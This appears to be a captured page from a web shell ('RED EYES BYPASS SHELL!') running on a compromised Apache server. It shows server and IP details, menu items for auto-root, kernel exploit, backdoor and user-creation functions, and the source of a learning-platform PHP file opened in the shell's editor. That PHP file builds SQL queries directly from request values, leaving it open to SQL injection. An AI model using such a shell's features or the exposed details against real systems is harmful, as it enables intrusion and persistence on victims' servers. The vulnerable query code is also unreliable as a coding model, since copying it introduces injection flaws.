Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
API /
ViewsCouse /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
Controller.php
8.92
KB
-rwxr-xr-x
SaveCouseManage.php
2.58
KB
-rwxr-xr-x
StudyCouse.php
5.21
KB
-rwxr-xr-x
couseFetch.php
3.6
KB
-rwxr-xr-x
couseSelect.php
3.52
KB
-rwxr-xr-x
saveControl.php
8.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : saveControl.php
<?php try { require_once("../../server/server.php"); if ($_SERVER["REQUEST_METHOD"] == "POST") { $Unitdata = json_decode($_POST["Unitdata"], true); // $db->query("TRUNCATE TABLE couse"); // $db->query("TRUNCATE TABLE dataunit"); // $db->query("TRUNCATE TABLE unit"); // $db->query("TRUNCATE TABLE form"); $Unitdetail = $_POST["Unitdetail"]; $Unitname = $_POST["Unitname"]; $status = $_POST["status"]; $AuthToken = $_POST["AuthToken"]; if ($status == false) { $status = 405; } else { $status = 200; } $id = $_SESSION["lms-ID"]; $date = date("Y-m-d H:i:"); $stmp = $db->prepare("SELECT ID, AuthToken from user where ID = '$id'"); if ($stmp->execute()) { $data = $stmp->fetch(PDO::FETCH_ASSOC); if (password_verify($AuthToken, $data["AuthToken"])) { $query = $db->prepare("INSERT INTO couse (userID,Unitname,detail,filetitle,detailType,value,date,rate,see,comment,status) value ('$id','$Unitname','$Unitdetail','','','','$date','0','0','0','$status')"); if ($query->execute()) { $allow = array("png", "jpg", "webp", "jpeg"); $couseID = $db->lastInsertId(); define('KB', 1024); define('MB', 1048576); define('GB', 1073741824); define('TB', 1099511627776); if (isset($_FILES["file"])) { $file = $_FILES["file"]; $ext = pathinfo($file["name"], PATHINFO_EXTENSION); $newFiletitle = rand(0, microtime(true)) . "." . $ext; if ($file["size"] < 15 * MB && in_array($ext, $allow)) { move_uploaded_file($_FILES["file"]["tmp_name"], "../../file/users/couse/" . $newFiletitle); $newFiletitle = "file/users/couse/" . $newFiletitle; $upd = $db->query("UPDATE couse set filetitle = '$newFiletitle' WHERE ID = '$couseID'"); } else { echo "out"; } } if (isset($_FILES["file-detail"])) { $file = $_FILES["file-detail"]; $ext = pathinfo($file["name"], PATHINFO_EXTENSION); $newFile = rand(0, microtime(true)) . "." . $ext; if ($file["size"] < 15 * MB && in_array($ext, $allow)) { move_uploaded_file($_FILES["file-detail"]["tmp_name"], "../../file/users/couse/" . $newFile); $newFile = "file/users/couse/" . $newFile; $upd = $db->query("UPDATE couse set value = '$newFile', detailType = 'file' WHERE ID = '$couseID'"); } } else if (isset($_POST["file-detail"])) { $file2 = "video"; $val = $_POST["file-detail"]; $upd = $db->query("UPDATE couse set value = '$val', detailType = 'video' WHERE ID = '$couseID'"); } // unit add for ($i = 0; $i < count($Unitdata); $i++) { for ($t = 0; $t < count($Unitdata[$i]["dataUnit"]); $t++) { $data = $Unitdata[$i]["dataUnit"][$t]; if ($data["type"] == "unit") { $see = $data["see"]; $skip = $data["skip"]; $end = $data["end"]; $video = $data["video"]; $Unitname = $data["Unitname"]; if ($see == false) { $see = 405; } else { $see = 200; } if ($end == false) { $end = 405; } else { $end = 200; } if ($skip == false) { $skip = 405; } else { $skip = 200; } $stmp = $db->query("SELECT role FROM unit ORDER BY role DESC limit 1")->fetch(PDO::FETCH_ASSOC); if (count($stmp) == "" || $stmp == "") { $sql1 = $db->query("INSERT INTO dataunit (name,video,see,skip,study) value ('$Unitname','$video','$see','$skip','$end')"); $unitID = $db->lastInsertId(); $sql2 = $db->query("INSERT INTO unit (couseID,type,role,unitID) value ('$couseID','unit','0','$unitID')"); } else { $order = $stmp["order"] + 1; $sql1 = $db->query("INSERT INTO dataunit (name,video,see,skip,study) value ('$Unitname','$video','$see','$skip','$end')"); $unitID = $db->lastInsertId(); $sql2 = $db->query("INSERT INTO unit (couseID,type,role,unitID) value ('$couseID','unit','$order','$unitID')"); } } else { $done = $data["done"]; $study = $data["study"]; $Unitname = $data["Unitname"]; if ($done == false) { $done = 405; } else { $done = 200; } if ($study == false) { $study = 405; } else { $study = 200; } $stmp = $db->query("SELECT role FROM unit ORDER BY role DESC limit 1")->fetch(PDO::FETCH_ASSOC); if (count($stmp) == "" || $stmp == "") { $sql1 = $db->query("INSERT INTO form (name,study,done,testID) value ('$Unitname','$study','$done','0')"); $formID = $db->lastInsertId(); $sql2 = $db->query("INSERT INTO unit (couseID,type,role,unitID) value ('$couseID','test','0','$formID')"); } else { $sql1 = $db->query("INSERT INTO form (name,study,done,testID) value ('$Unitname','$study','$done','0')"); $formID = $db->lastInsertId(); $order = $stmp["order"] + 1; $sql2 = $db->query("INSERT INTO unit (couseID,type,role,unitID) value ('$couseID','test','$order','$formID')"); } } } } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " AuthToken Invalid!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => " server Error!!")); exit; } } else { http_response_code(405); echo json_encode(array("status" => false, "message" => "Request method Not accept!!")); exit; } } catch (Exception $e) { http_response_code(405); echo json_encode(array("status" => false, "message" => $e->getMessage())); // dev errot report // echo json_encode(array("status" => false, "message" => "เกิดข้อผิดพลาด!!")); exit; }
Close